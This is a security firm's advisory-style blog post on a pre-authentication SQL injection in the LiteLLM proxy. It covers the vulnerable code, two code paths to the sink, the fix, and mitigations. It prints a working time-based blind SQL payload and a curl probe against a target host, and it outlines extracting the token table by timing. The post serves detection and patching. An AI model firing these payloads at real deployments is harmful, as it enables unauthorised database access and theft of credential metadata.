TL;DR Bishop Fox researchers reproduced and confirmed CVE-2026-42208, a critical pre-authentication SQL injection in BerriAI's LiteLLM proxy affecting versions 1.81.16 through 1.83.6. An attacker can exploit this flaw without logging in by sending a specially crafted request to an exposed endpoint, tricking the system into running unintended database queries. While the application still returns a standard “unauthorized” response, attackers can use subtle timing differences to extract sensitive information from the database. The attack also blends into normal server logs, where it looks identical to ordinary client misconfiguration errors, making it difficult to detect without specific monitoring rules. Exploitation in the wild was observed roughly 36 hours after the GitHub advisory was published. We recommend upgrading to 1.83.7 or later.
Summary
Bishop Fox researchers reproduced a critical pre-authentication SQL injection vulnerability affecting BerriAI's LiteLLM proxy in versions 1.81.16 through 1.83.6. LiteLLM is an open-source AI gateway that exposes OpenAI-compatible endpoints in front of more than 100 model providers and is increasingly common as the front door to internal LLM gateways at organizations that want unified cost tracking, key management, and rate limiting across vendors. The flaw lives inside an internal helper that resolves bearer tokens to virtual-key records, where a single missing parameter binding allows an unauthenticated attacker to inject arbitrary SQL into the proxy's PostgreSQL backend.
The vulnerability is reachable from any LLM API route (/v1/chat/completions, /v1/completions, /v1/messages, /v1/embeddings) without credentials. Because the response body is identical for every probe (HTTP 401 with a fixed JSON error), successful exploitation was confirmed with a time-based blind channel via PostgreSQL's pg_sleep(). On a stock Docker compose deployment with the BerriAI image and a default Postgres image sidecar, the application user is a database superuser, which raises the impact from "read sensitive metadata" to full read/write access against every LiteLLM-managed table, including LiteLLM_VerificationToken, where every active virtual key, team binding, and budget cap lives.
Bishop Fox's Threat Enablement & Analysis team leveraged LiteLLM fingerprints and CVE-2026-42208 detections to identify vulnerable instances across customer attack surfaces shortly after the GHSA advisory was published. These were handed off to Adversarial Operations which manually validated each finding. Affected customers were notified through the Bishop Fox Portal, so they could patch as soon as possible.
Background
LiteLLM is a Python proxy server that consolidates credentials, request routing, cost tracking, and rate limiting for 100+ LLM providers behind a single OpenAI-compatible API surface. Users issue "virtual keys" prefixed with sk- to internal users and applications, then map each key to budget caps, model whitelists, and team or organization bindings. The proxy persists this state in a PostgreSQL database accessed via the Python Prisma client. The result is that the proxy's database is an unusually concentrated repository of value: not just credentials, but a record of who in the organization can call which model, with what budget, and on whose behalf.
Two facts about the storage layer matter for this CVE.
- First, virtual keys are stored as SHA-256 hashes, so a database compromise does not directly produce a tray of plaintext API keys.
- Second, almost every raw database query in the proxy is parameterized through Prisma's
query_rawAPI with positional placeholders.
The combined-view lookup used during authentication is the exception, and the reason this CVE exists. The vulnerability window opened in version 1.81.16, which added a failure-metadata enrichment helper (_enrich_failure_metadata_with_key_info) that routes the raw, attacker-controlled bearer through to a pre-existing combined-view lookup. The underlying f-string SQL had been in proxy/utils.py since at least v1.81.15. What changed in 1.81.16 was the addition of an unauthenticated path to reach it, and that path remained open until the fix was implemented in 1.83.7. The advisory (GHSA-r75f-5x8p-qvmc) credits Tencent YunDing Security Lab with discovery. The v1.83.7-stable tag was published on April 18, 2026, with the GitHub Security Advisory following on April 25. According to Sysdig's analysis of customer telemetry, the first observed in-the-wild exploitation came within 36 hours of advisory publication.
Vulnerability Analysis
According to the GitHub Security Advisory, the flaw exists in the proxy's API key verification logic where "the caller-supplied key value [is interpolated] into the query text instead of passing it as a separate parameter." The vulnerable function is PrismaClient.get_data() in litellm/proxy/utils.py. When called with table_name="combined_view" (as the auth path does) and query_type="find_unique" (the function default), it constructs the lookup query with a Python f-string:sql_query = f"""
SELECT v.*, t.spend AS team_spend, t.max_budget AS team_max_budget, ...
FROM "LiteLLM_VerificationToken" AS v
LEFT JOIN "LiteLLM_TeamTable" AS t ON v.team_id = t.team_id
LEFT JOIN "LiteLLM_TeamMembership" AS tm ON v.team_id = tm.team_id AND tm.user_id = v.user_id
LEFT JOIN "LiteLLM_BudgetTable" AS b ON v.budget_id = b.budget_id
LEFT JOIN "LiteLLM_OrganizationTable" AS o ON v.organization_id = o.organization_id
LEFT JOIN "LiteLLM_BudgetTable" AS b2 ON o.budget_id = b2.budget_id
WHERE v.token = '{token}'
"""
response = await self._query_first_with_cached_plan_fallback(sql_query
The {token} interpolation is the sink. The string is sent to PostgreSQL via Prisma's query_first() method without any parameter binding. The function trusts that the token has already been hashed by the time it arrives, an assumption encoded in a small helper called _hash_token_if_needed:
def _hash_token_if_needed(token: str) -> str:
if token.startswith("sk-"):
return hash_token(token=token)
else:
return token
If the bearer starts with sk-, it is SHA-256 hashed and only hexadecimal characters reach the SQL. If it does not start with sk-, the helper returns the original string verbatim. The combination of these design choices is the entire vulnerability in three components: a query template that interpolates the bearer as a literal SQL string, a hashing helper that conditionally sanitizes its input based on a prefix check, and a failure-callback path that invokes the lookup with an unsanitized bearer.
Combined with the f-string sink, an attacker who supplies a bearer like ' OR (SELECT pg_sleep(6)) IS NULL -- lands their payload directly inside the single-quoted WHERE clause:
WHERE v.token = '' OR (SELECT pg_sleep(6)) IS NULL --'
PostgreSQL evaluates pg_sleep(6) once during the table scan, the entire request hangs for six seconds, and the proxy still returns a 401. Because the response body never reflects the query result, error-based, boolean-blind, and UNION-based SQLi techniques are all blocked. Only the timing channel leaks information. That timing channel is enough. Paired with pg_sleep and a binary-search tree, the entire LiteLLM_VerificationToken table is recoverable.
The failure mode is also nearly invisible to a defender. The HTTP response from a vulnerable host under attack is a normal-looking 401 with the standard LiteLLM auth-error JSON: {"error":{"message":"Authentication Error, ...","type":"auth_error","code":"401"}}. The only outwardly visible anomaly is response latency, and only if the attacker is monitoring per-endpoint p99 latency for the auth-failure path specifically. Server-side, the assertion error is logged by verbose_proxy_logger.exception() at auth_exception_handler.py:78, which produces a stack trace including the masked bearer ("Received=' ORL --, expected to start with 'sk-'"). Those log lines look identical to noise from misconfigured clients hitting the proxy without an sk- prefix. Without log-volume baselines or specific detection rules, the attack is essentially indistinguishable from friendly client misuse.
Two Paths to the Sink
The interesting wrinkle in this CVE is that get_data() is reachable from an unauthenticated request through two distinct code paths, and patching one of them was the original mitigation strategy.
The proxy's auth dispatcher in litellm/proxy/auth/user_api_key_auth.py includes a defensive guard intended to prevent exactly this class of bug:
assert api_key.startswith("sk-"), \
"LiteLLM Virtual Key expected. Received={}, expected to start with 'sk-'.".format(_masked_key)
if api_key.startswith("sk-"):
api_key = hash_token(token=api_key)
valid_token = await get_key_object(hashed_token=api_key, ...)
There are two ways past this guard:
- Path A: assertion stripped. Python assert statements are removed at bytecode load when the interpreter runs with
-OorPYTHONOPTIMIZE=1. Some hardened container images apply this optimization, in which case the raw, attacker-controlled bearer flows directly intoget_key_object()and through to the SQL sink. - Path B: assertion fires (default). The
AssertionErrorraised by the guard is caught by an outer except Exception clause that dispatches toUserAPIKeyAuthExceptionHandler._handle_authentication_error(). That handler awaitsproxy_logging_obj.post_call_failure_hook(...), which iterateslitellm.callbacksand invokes_ProxyDBLogger.async_post_call_failure_hook(). Inside, the metadata dict is populated with_metadata["user_api_key"] = user_api_key_dict.api_key(the raw bearer) and passed to_enrich_failure_metadata_with_key_info(), which calls get_key_object(hashed_token=api_key_hash, ...). Despite the variable name,api_key_hashhere is unhashed.
Both paths arrive at the same SQL sink with the same attacker-controlled string, so exploitation is identical between them once the sink is reached. The advisory's published workaround (general_settings.disable_error_logs: true) only mitigates Path B by short-circuiting _ProxyDBLogger._should_track_errors_in_db() before the failure callback runs. A hardened deployment running with -O would remain exploitable through Path A even with the workaround in place. Path B is the path we exercised in our lab against a stock Docker deployment, where the BerriAI image runs with assertions enabled and the failure callback fires on every non-sk- bearer. Path A is reachable through source-level analysis when assertions are stripped; we did not separately exercise it.
The variable name api_key_hash in _enrich_failure_metadata_with_key_info deserves a callout for anyone reviewing the proxy's source. The name strongly implies a hashed value, and a security review focused on grep'ing for raw bearer tokens would skim past it. In reality the variable holds whatever was assigned to _metadata["user_api_key"] upstream, which traces back to user_api_key_dict.api_key, the raw attacker-controlled string. Misnamed variables are a remarkably durable source of vulnerability classes.
Testing for Exposure
A single timed HTTP request is enough to determine whether a LiteLLM deployment is vulnerable. The probe payload below exercises the f-string injection path described in the GHSA advisory and triggers pg_sleep in the proxy's PostgreSQL backend, producing an unambiguous timing differential.
$ time curl -X POST https://TARGET/v1/chat/completions \
-H "Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NULL --" \
-H "Content-Type: application/json" \
-d '{"model":"x","messages":[{"role":"user","content":"x"}]}'
...omitted for brevity...
0.00s user 0.01s system 0% cpu 6.058 total
A vulnerable host returns HTTP 401 in approximately six seconds. A patched host returns HTTP 401 in under 100 milliseconds. The delta is unmistakable. We confirmed this end-to-end against the published ghcr.io/berriai/litellm-database:v1.83.6-nightly image with a default PostgreSQL 16 backend; PostgreSQL server logs captured the injected query verbatim:
WHERE v.token = '' OR (SELECT pg_sleep(6)) IS NULL --'
To rule out network jitter or an intermediate WAF tarpit, repeat the request two or three times. Consistent multi-second responses indicate the vulnerability; uniform slowness regardless of payload indicates a tarpit or other latency source. The probe issues a single SQL query against the verification token table and does not exfiltrate any database content.
Two preconditions matter for the test to be conclusive: the deployment must use a PostgreSQL backend (the default), and general_settings.disable_error_logs must be at its default value of false. A freshly initialized proxy with zero rows in LiteLLM_VerificationToken will not trigger the timing channel because PostgreSQL skips the WHERE evaluation on an empty table, but any production deployment satisfies that precondition by definition.
Why this matters: the database behind a LiteLLM deployment holds every active virtual key (as a SHA-256 hash), every team and organization binding, and every spend record. Confirming exposure with a single timed request and patching to 1.83.7 takes less effort than the post-incident rotation cycle.
The Patch
LiteLLM addressed the vulnerability in version 1.83.7 with a two-pronged fix to proxy/utils.py. The primary combined_view lookup, the sink we exploited, retained its raw SQL form but introduced a positional placeholder so the user-supplied value is passed as a separate parameter:
sql_query = """ SELECT v.*, t.spend AS team_spend, ... FROM "LiteLLM_VerificationToken" AS v LEFT JOIN ... WHERE v.token = $1 """ response = await self._query_first_with_cached_plan_fallback( sql_query, hashed_token )
The sister deprecated-token lookup was extracted to a helper and rewritten using Prisma's typed find_first() API:
deprecated_row = await self.db.litellm_deprecatedverificationtoken.find_first(
where={
"token": hashed_token,
"revoke_at": {"gt": datetime.now(timezone.utc)},
},
select={"active_token_id": True},
)
The fix commit has a refreshingly direct message: "fix: refactor, race condition handle, fstring sql injection." The patch is contained to litellm/proxy/utils.py and key_management_endpoints.py, requires no schema migrations, and does not change any externally observable behavior beyond eliminating the injection. The fix is the right shape.
Rather than auditing every f-string call site, the maintainers fixed the two auth-path queries directly through proper parameter binding, one via PostgreSQL placeholders and the other via Prisma's typed API. Both approaches close the injection at the sink, which means the fix holds against either Path A or Path B regardless of which caller reaches it.
Conclusion
CVE-2026-42208 is a textbook example of an f-string SQL injection in an internal helper function reached through an exception path nobody thought of as a privileged context. The auth dispatcher's assert was clearly written as a defensive guard against this exact class of bug, but the guard's failure mode was an exception caught by a generic handler that re-introduced the unsanitized input into a database lookup six call frames away. Defense-in-depth only works if the depths are connected.
The 36-hour interval from public advisory to in-the-wild exploitation is worth dwelling on. The advisory disclosed the affected version range and a one-line workaround, and the open-source schema disclosed the table and column names. Together they were enough for an attacker to reconstruct a working exploit faster than most organizations can complete a change-control ticket.
As Sysdig's Michael Clark put it: "exploitation no longer waits for a public PoC." For organizations operating LLM gateways exposed to untrusted networks, the action items are short:
- Confirm the running version with
GET /health/readinessand upgrade to 1.83.7 or later. - As an interim mitigation, set
general_settings.disable_error_logs: truein the LiteLLM config, and pair it with a WAF rule rejecting anyAuthorization: Bearervalue that does not match^sk-[A-Za-z0-9_-]+$. - Rotate every virtual key that was live during the vulnerable window. Hash recovery is computationally expensive, but the metadata exposure (key aliases, owners, budgets) is sufficient input for follow-on social engineering even without plaintext key recovery.
Bishop Fox's Cosmos platform actively scans customer attack surfaces for vulnerable LiteLLM deployments and alerts customers within hours of new CVE disclosures of this severity. As AI infrastructure rapidly expands and new attack paths emerge, maintaining visibility becomes critical. If you want to learn more or see a demo of Cosmos, Get Started here.
Subscribe to our blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.
Recommended Posts